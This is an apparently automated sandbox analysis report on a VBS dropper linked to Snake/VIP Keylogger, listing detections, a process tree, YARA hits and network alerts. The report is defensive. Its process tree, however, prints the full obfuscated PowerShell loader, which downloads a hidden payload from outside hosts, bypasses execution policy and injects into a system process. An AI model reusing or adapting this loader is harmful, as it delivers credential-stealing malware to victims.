Windows Analysis Report
Doc261124.vbs

Overview

General Information

Sample name: Doc261124.vbs
Analysis ID: 1562920
MD5: 3e9ccaacccb792299a0b1c12b537817e
SHA1: 4f2707cf3bc5216ab4e41265c00a9264edb3edd6
SHA256: 5a813cfc61c2b1c738d0c5785812dc28f461631a70d98b970fc9810f709dbd94
Tags: vbs, user-abuse_ch

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VBS Downloader Generic
Yara detected VIP Keylogger
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign process
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7800 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7928 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVzID0gRUlId2ViQ2xpZW50LkRvd25sb2FkRGF0YShFSUhpbWFnZVVybCk7RUlIaW1hZ2VUZXgnKyd0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoRUlIaScrJ21hZ2VCeXRlcyk7RUlIc3RhcnRGbGFnID0gek5xPDxCQVNFNjRfU1RBUlQnKyc+PnpOcTtFSUgnKydlbmRGbGFnID0gek5xPDxCQVNFNjRfRU5EPj56TnE7RUlIc3QnKydhcnQnKydJbmRleCA9IEVJSGltYWdlVGV4dC5JbmRleE9mJysnKEVJSHN0YXJ0RmxhZyk7RUlIZW4nKydkSW5kZXggPSBFSUhpbWFnZVRleHQuSW5kZScrJ3hPJysnZihFSUhlbicrJ2RGbGFnKTtFSUhzdGFydEluZGV4IC1nZSAwIC1hbmQgRUlIZW5kSW5kZXggLWd0IEVJSHN0YXJ0SW5kZXg7RUlIc3RhcnRJbmRleCArPSBFSUhzdGFydEZsYWcuTGVuZ3RoO0VJSGJhc2U2NExlbmd0aCA9IEVJSGVuZEluZGV4IC0gRUlIc3RhcnRJbmRleDtFSUhiYXNlNjRDb20nKydtYW5kID0gRUlIaW1hZ2VUZXh0LlN1YnN0cmluZygnKydFSUhzdGFydEluZGV4LCBFSUhiYXNlJysnNjRMZW5ndGgpO0VJSGJhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEVJSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBPVEYgRm9yRWFjaC1PYmplY3QgeyBFSUhfIH0pWy0xLi4tJysnKEVJSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07RScrJ0lIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhFSUgnKydiYXNlJysnNjRSZXZlcnNlZCk7RUlIbG9hZGVkQXNzZW1ibHkgPSBbUycrJ3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEVJSGNvbW1hbmQnKydCeXRlcyk7RUlIdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6TnFWQUl6TnEpO0VJSHZhaU1ldGhvZC5JbnZva2UoRUlIbnVsbCwgQCh6TnF0eHQucnNlZy95ZicrJ2cnKycvdWUucmVsbG9ydycrJ3Noc3VwLnYnKydicy8vOnAnKyd0dGgnKyd6TnEsIHpOcWRlc2F0JysnaXZhZG96TnEsIHpOcWRlc2EnKyd0aXZhZG96JysnTnEsIHpOJysncWRlc2F0aXZhZG96TnEsJysnIHpOcWRlc2F0aXZhZG96TnEsIHpOcTEnKyd6TnEsIHpOcU9uZURyaXZlU2V0dXB6TnEsIHpOcWR
lc2F0aXZhZG96TnEsIHpOcWRlc2F0aXZhZG96TnEsek5xZGVzYXRpdmFkb3pOcSx6TnFkJysnZXNhdGl2YWRvek5xLHpOcWRlc2F0aXZhJysnZG96TnEsek5xMXpOcSx6TnFkZXMnKydhdCcrJ2l2YWRvek5xKSk7JykgIC1DUkVQbGFjZSd6TnEnLFtDaEFSXTM5IC1yZXBsQWNlIChbQ2hBUl02OStbQ2hBUl03MytbQ2hBUl03MiksW0NoQVJdMzYtcmVwbEFjZSAoW0NoQVJdNzkrW0NoQVJdODQrW0NoQVJdNzApLFtDaEFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • OneDriveSetup.exe (PID: 7588 cmdline: "C:\Windows\SysWOW64\OneDriveSetup.exe" MD5: 0EA845F896C821E04009C0336D7547EC)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
No configs have been found
Source | Rule | Description | Author | Strings
Doc261124.vbs | JoeSecurity_VBS_Downloader_Generic | Yara detected VBS Downloader Generic | Joe Security

Source | Rule | Description | Author | Strings
00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
    • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x1300:$s3: 83 EC 38 53 B0 A4 88 44 24 2B 88 44 24 2F B0 A3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1fdd0:$s5: delete[]
    • 0x1f288:$s6: constructor or from DllMain.
00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
          • 0x35918:$a1: get_encryptedPassword
          • 0x358ec:$a2: get_encryptedUsername
          • 0x359b0:$a3: get_timePasswordChanged
          • 0x358c8:$a4: get_passwordField
          • 0x3592e:$a5: set_encryptedPassword
          • 0x356fb:$a7: get_logins
          • 0x30fbe:$a10: KeyLoggerEventArgs
          • 0x30f8d:$a11: KeyLoggerEventArgsEventHandler
          • 0x357cf:$a13: _encryptedPassword
Source | Rule | Description | Author | Strings
6.2.OneDriveSetup.exe.400000.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 A4 88 44 24 2B 88 44 24 2F B0 A3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
6.2.OneDriveSetup.exe.400000.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 A4 88 44 24 2B 88 44 24 2F B0 A3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
6.2.OneDriveSetup.exe.8b00f20.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
6.2.OneDriveSetup.exe.8b00f20.3.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
6.2.OneDriveSetup.exe.8b00f20.3.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security

Source | Rule | Description | Author | Strings
amsi64_8064.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

System Summary

Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7800, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs", ProcessId: 7800, ProcessName: wscript.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7800, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs", ProcessId: 7800, ProcessName: wscript.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVz
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 
-windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloade
                  Timestamp                        | SID     | Severity | Classtype                     | Source IP      | Source Port | Destination IP  | Destination Port | Protocol
                  2024-11-26T09:32:50.785311+0100  | 2028371 | 3        | Unknown Traffic               | 192.168.2.8    | 49706       | 104.21.84.67    | 443              | TCP
                  2024-11-26T09:32:42.115660+0100  | 2057635 | 1        | A Network Trojan was detected | 5.182.211.149  | 80          | 192.168.2.8     | 49711            | TCP
                  2024-11-26T09:33:01.135577+0100  | 2049038 | 1        | A Network Trojan was detected | 193.30.119.205 | 443         | 192.168.2.8     | 49707            | TCP
                  2024-11-26T09:33:25.683925+0100  | 2803305 | 3        | Unknown Traffic               | 192.168.2.8    | 49714       | 172.67.177.134  | 443              | TCP
                  2024-11-26T09:33:41.335289+0100  | 2803305 | 3        | Unknown Traffic               | 192.168.2.8    | 49724       | 172.67.177.134  | 443              | TCP
                  2024-11-26T09:33:47.793673+0100  | 2803305 | 3        | Unknown Traffic               | 192.168.2.8    | 49728       | 172.67.177.134  | 443              | TCP
                  2024-11-26T09:33:21.237828+0100  | 2803274 | 2        | Potentially Bad Traffic       | 192.168.2.8    | 49712       | 193.122.6.168   | 80               | TCP
                  2024-11-26T09:33:24.003462+0100  | 2803274 | 2        | Potentially Bad Traffic       | 192.168.2.8    | 49712       | 193.122.6.168   | 80               | TCP
                  2024-11-26T09:33:27.222225+0100  | 2803274 | 2        | Potentially Bad Traffic       | 192.168.2.8    | 49715       | 193.122.6.168   | 80               | TCP
                  2024-11-26T09:32:42.115660+0100  | 2858295 | 1        | A Network Trojan was detected | 5.182.211.149  | 80          | 192.168.2.8     | 49711            | TCP


                  AV Detection

                  Source: http://sbv.pushswroller.eu/gfy/gesr.txtAvira URL Cloud: Label: malware
                  Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                  Location Tracking

                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.8:49713 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.8:49706 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.8:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2
                  Source: Binary string: _.pdb source: OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp

                  Spreading

                  Source: Yara matchFile source: Doc261124.vbs, type: SAMPLE

                  Software Vulnerabilities

                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41DC84h6_2_0C41D9D8
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C413206h6_2_0C412DE8
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C412834h6_2_0C412580
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41E0DCh6_2_0C41DE30
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C410D0Fh6_2_0C410B30
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C411699h6_2_0C410B30
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_0C410040
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41FAECh6_2_0C41F840
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_0C410856
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41CF7Ch6_2_0C41CCD0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41D3D4h6_2_0C41D128
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C413206h6_2_0C413134
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C413206h6_2_0C412DDA
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41D82Ch6_2_0C41D580
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_0C410676
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41E98Ch6_2_0C41E6E0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41E534h6_2_0C41E288
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41EDE4h6_2_0C41EB38
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41F694h6_2_0C41F3E8
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41F23Ch6_2_0C41EF90

                  Networking

                  Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 5.182.211.149:80 -> 192.168.2.8:49711
                  Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 5.182.211.149:80 -> 192.168.2.8:49711
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 193.30.119.205:443 -> 192.168.2.8:49707
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.21.84.67 443Jump to behavior
                  Source: unknownDNS query: name: paste.ee
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPE
